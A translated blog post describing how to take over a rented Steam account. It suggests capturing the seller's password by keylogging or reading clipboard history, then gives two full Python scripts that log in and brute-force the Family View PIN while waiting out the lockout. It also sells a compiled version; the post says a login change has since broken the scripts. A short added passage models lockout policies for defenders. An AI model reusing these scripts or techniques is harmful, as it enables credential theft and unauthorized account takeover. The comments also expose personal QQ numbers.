Brute-Forcing Steam Family View
卖女孩的小火柴 - 搬砖中
January 4, 2020

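I bought an "offline edition" of a Steam game on Taobao. In practice the seller gives you an account; you download and install the game and then run it in offline mode. Paired with a Steam account manager, it plays quite nicely.
But the Family View badge in the client kept nagging at me...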

No longer works

It has been confirmed that Steam changed its login algorithm, so the scripts in this post no longer work.

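How do you get the account password?

Many shops are unwilling to hand over the account password. They prefer to connect remotely, type in the account name and password themselves, set everything up, and then switch the client to offline mode.
This is actually easy to deal with. Steam's own protection is not very thorough: you can record the typed password by logging keystrokes, and if you run into a seller who, like me, lazily copies and pastes, you only need to open Windows' built-in clipboard history (Win logo key + V) to see the copied account name and password.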

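How do you get the Family View key?

Both the Steam client and the Steam website are affected by Family View. In my testing, both the client and the website pause input for 3 minutes after 5 wrong entries, so of course I chose to work on the website.
Capturing the traffic is simple too. Note that one parameter is delivered embedded in the web page and has to be extracted; then, when the error appears, pause for 3 minutes and continue.

rsa.js.zip
The script is below: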

#!/usr/bin/env python
# -*- coding:utf-8 -*- 
# time: 2018/9/6--19:24
__author__ = 'Henry'
# I use his login code ,thx him
__sauthor__ = 'zponds'

'''
Steam login (RSA)
URL:https://store.steampowered.com/login/
'''

import requests
import time
import re
import execjs
import json

def steam_login():
    req = requests.session()
    headers = {
        'Referer': 'https://store.steampowered.com/login/',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/79.0.3945.88 Safari/537.36 Edg/79.0.309.54',
    }
    url = 'https://store.steampowered.com/login/getrsakey/'
    data = {
        'donotcache': str(int(time.time() * 1000)),
        'username': user
    }
    html = req.post(url, data=data, headers=headers).json()
    pub_mod = html.get('publickey_mod')
    pub_exp = html.get('publickey_exp')
    timestamp = html.get('timestamp')

    with open('rsa.js', encoding='utf-8') as f:
        jsdata = f.read()
    passencrypt = execjs.compile(jsdata).call('getpwd', password, pub_mod, pub_exp)
    print(passencrypt)
    # login
    url = 'https://store.steampowered.com/login/dologin/'
    data = {
        'donotcache': str(int(time.time() * 1000)),
        'username': user,
        'password': passencrypt,
        'twofactorcode': '',
        'emailauth': '',
        'loginfriendlyname': '',
        'captchagid': '-1',
        'captcha_text': '',
        'emailsteamid': '',
        'rsatimestamp': timestamp,
        'remember_login': 'false',
    }
    html = req.post(url, data=data, headers=headers).json()
    if html.get('emailauth_needed') == True:
        print('Login requires your email verification code')
        emailid = html.get('emailsteamid')
        email = input('Please enter your email verification code:')
        # login again
        data['emailauth'] = email
        data['emailsteamid'] = emailid
        html = req.post(url, data=data, headers=headers).json()
        print(html)
        if html.get('login_complete') == True and html.get('success') == True:
            print('logining...')
            url_store = 'https://store.steampowered.com/'
            html = req.get(url_store, headers=headers).text
            username = re.findall(r'data-miniprofile=".*?">(.*?)</a>', html)[0]
            print('[Success!Username:' + username + ']')
            r = req.get('https://store.steampowered.com/parental/blocked')
            if '/parental/unlock' in r.text:
                print('The account has a family view')
                sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
                success = False
                start = input('PIN from:')
                start_time = int(time.time())
                for pin in range(int(start) - 1, 10000):
                    flag = True
                    while flag:
                        # Extract the sessionID
                        pin_str = str(pin)
                        while len(pin_str) < 4:
                            pin_str = "0" + pin_str
                        data = {
                            'pin': pin_str,
                            'sessionid': sessionID
                        }
                        try:
                            r = req.post('https://store.steampowered.com/parental/ajaxunlock', data=data,
                                         headers=headers)
                            r_json = json.loads(r.text)
                            if r_json['success'] == False:
                                if 'wait a while' in r_json['error_message']:
                                    print('Sleep...')
                                    time.sleep(180)
                                    r = req.get('https://store.steampowered.com/parental/blocked')
                                    sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
                                else:
                                    flag = False
                                    print("PIN: %s: %s" % (pin_str, r_json['error_message']))
                            else:
                                print("PIN: %s: SUCCESS!" % pin_str)
                                end_time = int(time.time())
                                print("Time: %ds" % (end_time-start_time))
                                success = True
                        except BaseException as e:
                            print('Error...')
                            time.sleep(10)
                        if success:
                            exit(0)
                else:
                    print('The account does not have a family view')
        else:
            print('login fail...')
    elif html.get('success') == False and html.get('message') != '':
        print(html.get('message'))
        print('login fail...')


if __name__ == '__main__':
    user = input('account:')
    password = input('password:')
    steam_login()

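With PINs from 0000 to 9999 and 5 attempts every 3 minutes, even with the worst luck it is only a matter of 2-3 days. Just leave it running on a server.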
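Seen from the service's side, the figures above (a 10,000-value PIN space throttled at 5 wrong tries per 3-minute pause) only delay exhaustion rather than prevent it. The following is an added example, not part of the original post: it compares that flat lockout with a hypothetical escalating one (pause doubling per lockout, capped at 24 h; these parameters are assumptions) and ignores request latency.

```python
# Added example: models PIN lockout policies from the server's point of view.
PIN_SPACE = 10_000  # 4-digit PIN, 0000-9999 (from the post)


def fixed_policy(per_window=5, pause_s=180):
    """Behaviour reported in the post: 5 wrong PINs, then a flat 3-minute pause."""
    return per_window, lambda lockouts: pause_s


def escalating_policy(per_window=5, base_s=180, factor=2, cap_s=86_400):
    """Hypothetical hardening: every lockout doubles the pause, capped at 24 h."""
    return per_window, lambda lockouts: min(base_s * factor ** lockouts, cap_s)


def exhaust_seconds(policy, space=PIN_SPACE):
    """Enforced waiting time before every PIN in the space can have been tried."""
    per_window, pause = policy
    lockouts_needed = -(-space // per_window) - 1  # no pause after the last batch
    return sum(pause(i) for i in range(lockouts_needed))


def guesses_within(budget_s, policy, space=PIN_SPACE):
    """Upper bound on distinct PINs one client can submit inside budget_s seconds."""
    per_window, pause = policy
    elapsed = lockouts = guesses = 0
    while guesses < space:
        guesses = min(guesses + per_window, space)
        wait = pause(lockouts)
        if elapsed + wait > budget_s:
            break
        elapsed += wait
        lockouts += 1
    return guesses


if __name__ == "__main__":
    two_days = 48 * 3600
    for name, policy in (("fixed", fixed_policy()), ("escalating", escalating_policy())):
        days = exhaust_seconds(policy) / 86_400
        share = guesses_within(two_days, policy) / PIN_SPACE
        print(f"{name:10s} exhaust: {days:8.1f} days   covered in 48 h: {share:.2%}")
```

Under the flat policy the enforced waiting needed to cover the whole space is about 4.2 days (roughly half that on average), while the escalating variant limits a client to 50 guesses in 48 hours.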

What after you have the key?

Once Family View is removed, you can add Family Sharing.
From then on, the right to use the account is yours.

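What? You can't run Python?

No problem, I have prepared a ready-to-use Windows version! Buy the attachment, download it, and use it directly!
One session of guidance is included as well!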

Update, March 18, 2020

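  • After a disconnect it automatically tries to log in again
  • When finished it asks you to type EXIT to quit
  • Bug fixes
  • The compiled Windows file has of course been updated too
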
#!/usr/bin/env python
# -*- coding:utf-8 -*- 
# time: 2018/9/6--19:24
__author__ = 'Henry'
# I use his login code ,thx him
__sauthor__ = 'zponds'

'''
Steam login (RSA)
URL:https://store.steampowered.com/login/
'''

import requests
import time
import re
import execjs
import json

def steam_login(open_start=-1):
    req = requests.session()
    headers = {
        'Referer': 'https://store.steampowered.com/login/',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/79.0.3945.88 Safari/537.36 Edg/79.0.309.54',
    }
    url = 'https://store.steampowered.com/login/getrsakey/'
    data = {
        'donotcache': str(int(time.time() * 1000)),
        'username': user
    }
    html = req.post(url, data=data, headers=headers).json()
    pub_mod = html.get('publickey_mod')
    pub_exp = html.get('publickey_exp')
    timestamp = html.get('timestamp')

    with open('rsa.js', encoding='utf-8') as f:
        jsdata = f.read()
    passencrypt = execjs.compile(jsdata).call('getpwd', password, pub_mod, pub_exp)
    # print(passencrypt)
    # login
    url = 'https://store.steampowered.com/login/dologin/'
    data = {
        'donotcache': str(int(time.time() * 1000)),
        'username': user,
        'password': passencrypt,
        'twofactorcode': '',
        'emailauth': '',
        'loginfriendlyname': '',
        'captchagid': '-1',
        'captcha_text': '',
        'emailsteamid': '',
        'rsatimestamp': timestamp,
        'remember_login': 'true',
    }
    html = req.post(url, data=data, headers=headers).json()
    if html.get('emailauth_needed') == True:
        print('登陆需要邮箱验证码...')
        emailid = html.get('emailsteamid')
        email = input('请输入验证码:')
        # login again
        data['emailauth'] = email
        data['emailsteamid'] = emailid
        html = req.post(url, data=data, headers=headers).json()
        # print(html)
    if html.get('login_complete') == True and html.get('success') == True:
        print('logining...')
        url_store = 'https://store.steampowered.com/'
        html = req.get(url_store, headers=headers).text
        username = re.findall(r'data-miniprofile=".*?">(.*?)</a>', html)[0]
        print('[登陆成功!用户名:' + username + ']')
        r = req.get('https://store.steampowered.com/parental/blocked')
        if '/parental/unlock' in r.text:
            print('这个账户存在家庭监护')
            sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
            success = False
            if open_start == -1:
                start = input('从多少开始PIN(第一次运行请从0000开始):')
            else:
                start = open_start
            start_time = int(time.time())
            for pin in range(int(start) - 1, 10000):
                flag = True
                while flag:
                    # Extract the sessionID
                    pin_str = str(pin)
                    while len(pin_str) < 4:
                        pin_str = "0" + pin_str
                    data = {
                        'pin': pin_str,
                        'sessionid': sessionID
                    }
                    try:
                        r = req.post('https://store.steampowered.com/parental/ajaxunlock', data=data,
                                     headers=headers)
                        if len(r.text) > 2000:
                            return steam_login(pin)
                        r_json = json.loads(r.text)
                        if r_json['success'] == False:
                            if 'wait a while'  in r_json['error_message'] or '错误尝试' in r_json['error_message']:
                                print('等待中...')
                                time.sleep(180)
                                r = req.get('https://store.steampowered.com/parental/blocked')
                                sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
                            else:
                                flag = False
                                print("PIN: %s: %s" % (pin_str, r_json['error_message']))
                        else:
                            print("PIN: %s: 成功!" % pin_str)
                            end_time = int(time.time())
                            print("Time: %ds" % (end_time-start_time))
                            success = True
                    except BaseException as e:
                        print('Error...')
                        time.sleep(10)
                    if success:
                        return
        else:
            print('您的账户不存在家庭监护!')
    else:
        print(html.get('message'))
        print('登陆失败...')


if __name__ == '__main__':
    user = input('账户名:')
    password = input('密码:')
    print('注意,跑PIN耗时可能非常长...可能长达两天...')
    steam_login()
    end = input('输入 EXIT 以退出...')
    while end != 'EXIT':
        end = input('输入 EXIT 以退出...')
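
Author: 卖女孩的小火柴 - 搬砖中
Link: https://www.shinenet.cn/archives/82.html
Last modified: 2023-12-19 21:53:36
Unless marked as a repost, all articles on this site are original and licensed under CC BY-NC-SA 4.0. Please credit the source when reposting. Thanks!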
Comments
56 comments so far
Test
2020-03-04 21:52
Test comment
lalala
2020-02-26 23:04
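How exactly do I swap the parameters, boss?
2020-02-27 10:24
@lalala Just get it running first.
If it really doesn't work, contact me and I can help run it.
This thing doesn't use many resources.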
小白
2020-02-27 15:50
@卖女孩的小火柴 How do I add you?
2020-02-27 18:52
@小白 Why is your email different every time...
QQ 1005468403
456
2020-02-21 22:09
Boss, how do I use this? [newbie]
2020-03-04 21:54
@456 The script for Windows is ready, I'll post it in a bit.
666
2020-02-20 19:26
Boss, please upload the rsa.js file, thanks!
2020-02-21 19:09
@666 Very sorry, it has been updated.
深圳那边
2020-03-03 19:59
@卖女孩的小火柴 Are you there? Add me on QQ 2385024260, I'd like to ask you something.
2020-03-03 21:04
@深圳那边 You added me, so why aren't you saying anything...